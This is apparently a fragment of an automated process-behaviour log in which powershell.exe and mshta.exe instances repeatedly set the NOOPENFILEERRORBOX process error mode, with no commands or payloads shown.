Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
